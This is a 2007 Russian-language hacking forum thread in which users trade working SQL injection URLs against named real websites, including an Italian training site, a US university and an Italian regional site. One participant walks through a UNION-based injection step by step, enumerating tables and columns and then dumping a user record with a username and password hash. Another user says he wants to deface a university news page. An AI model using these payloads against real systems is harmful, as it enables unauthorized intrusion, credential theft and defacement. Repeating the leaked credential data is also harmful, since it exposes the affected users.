HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 27.11.2007, 17:19
YaNeLam
Новичок
Регистрация: 23.10.2007
Сообщений: 28
С нами: 9763159

Репутация: 19
По умолчанию

[aywo]
А там вообще чего есть?
 
Ответить с цитированием

  #2  
Старый 27.11.2007, 17:45
[aywo]
Познающий
Регистрация: 01.02.2007
Сообщений: 89
С нами: 10143707

Репутация: 114
По умолчанию

2YaNeLam что ты имеешь ввиду?
 
Ответить с цитированием

  #3  
Старый 27.11.2007, 22:21
YaNeLam
Новичок
Регистрация: 23.10.2007
Сообщений: 28
С нами: 9763159

Репутация: 19
По умолчанию

ну там вообще на Ipb 1.3 патченом есть Sql?
 
Ответить с цитированием

  #4  
Старый 27.11.2007, 22:24
[aywo]
Познающий
Регистрация: 01.02.2007
Сообщений: 89
С нами: 10143707

Репутация: 114
По умолчанию

тебе сюда _https://forum.antichat.ru/thread15678.html
 
Ответить с цитированием

  #5  
Старый 28.11.2007, 16:49
Mike 007
Познающий
Регистрация: 04.04.2007
Сообщений: 54
С нами: 10054253

Репутация: 86
По умолчанию

Код:
http://www.progettocompetence.it/sito/sistema/articolo.php?id=-1+union+select+1,2,table_name,4,5+from+information  _schema.tables/*
что дальше делать не подскажите?
 
Ответить с цитированием

  #6  
Старый 28.11.2007, 17:07
ZAMUT
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
С нами: 9762146

Репутация: 1174
По умолчанию

Цитата:
Сообщение от Mike 007  
что дальше делать не подскажите?
Код:
http://www.progettocompetence.it/sito/sistema/articolo.php?id=-1+union+select+1,2,concat(table_schema,0x3a,table_name),4,5+from+information_schema.columns+where+column_name=0x70617373776F7264+--+
progettocompetence_it:areariservata_utenti
Код:
http://www.progettocompetence.it/sito/sistema/articolo.php?id=-1+union+select+1,2,column_name,4,5+from+information_schema.columns+where+table_schema=0x70726F676574746F636F6D706574656E63655F6974+and+table_name=0x617265617269736572766174615F7574656E7469+limit+1,1+--+
id
userid
password
Код:
http://www.progettocompetence.it/sito/sistema/articolo.php?id=-1+union+select+1,2,concat_ws(0x3a,id,userid,password),4,5+from+progettocompetence_it.areariservata_utenti+limit+0,1+--+
1:Ilic:ff112557a3a0a4d1e74f56e0ac979467

Крути limit ....
 
Ответить с цитированием

  #7  
Старый 30.11.2007, 04:43
noneim
Новичок
Регистрация: 28.11.2007
Сообщений: 5
С нами: 9712206

Репутация: 0
По умолчанию

Код:
http://www.millikin.edu/athletics/archives_sport.asp?SPORT=6%20and%201=1%20UNION+SELECT+1,2,3,NULL+FROM%20INFORMATION_SCHEMA.TABLES%20--

Исключительно в образовательных целях хотелось бы изменить вот эту страничку
Код:
http://www.millikin.edu/media/print_release.asp?NEWS_ID=1227
имена таблиц похоже только методом тыка.. через ; пробовал менять таблицу news - толку 0...
 
Ответить с цитированием

  #8  
Старый 28.11.2007, 21:00
Mike 007
Познающий
Регистрация: 04.04.2007
Сообщений: 54
С нами: 10054253

Репутация: 86
По умолчанию

Код:
http://www.mpa-lazio.it/articolo.php?id=-1+union+select+1,2,3,table_name,5,6,7,8+from+information_schema.COLUMNS/*
а тут что делать?
 
Ответить с цитированием

  #9  
Старый 28.11.2007, 21:09
ZAMUT
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
С нами: 9762146

Репутация: 1174
По умолчанию

Цитата:
Сообщение от Mike 007  
Код:
http://www.mpa-lazio.it/articolo.php?id=-1+union+select+1,2,3,table_name,5,6,7,8+from+information_schema.COLUMNS/*
а тут что делать?
Аналогично вышеизложенному.
 
Ответить с цитированием

  #10  
Старый 28.11.2007, 21:45
Mike 007
Познающий
Регистрация: 04.04.2007
Сообщений: 54
С нами: 10054253

Репутация: 86
По умолчанию

а +where+co lumn_name=0x70617373776F7264+--+ откуда?
и
Код:
+where+table_schema=0x70726F676574  746F636F6D706574656E63655F6974+and+table_name=0x61  7265617269736572766174615F7574656E7469+limit+1,1+--+
откуда взяось?

Последний раз редактировалось Mike 007; 28.11.2007 в 21:54..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.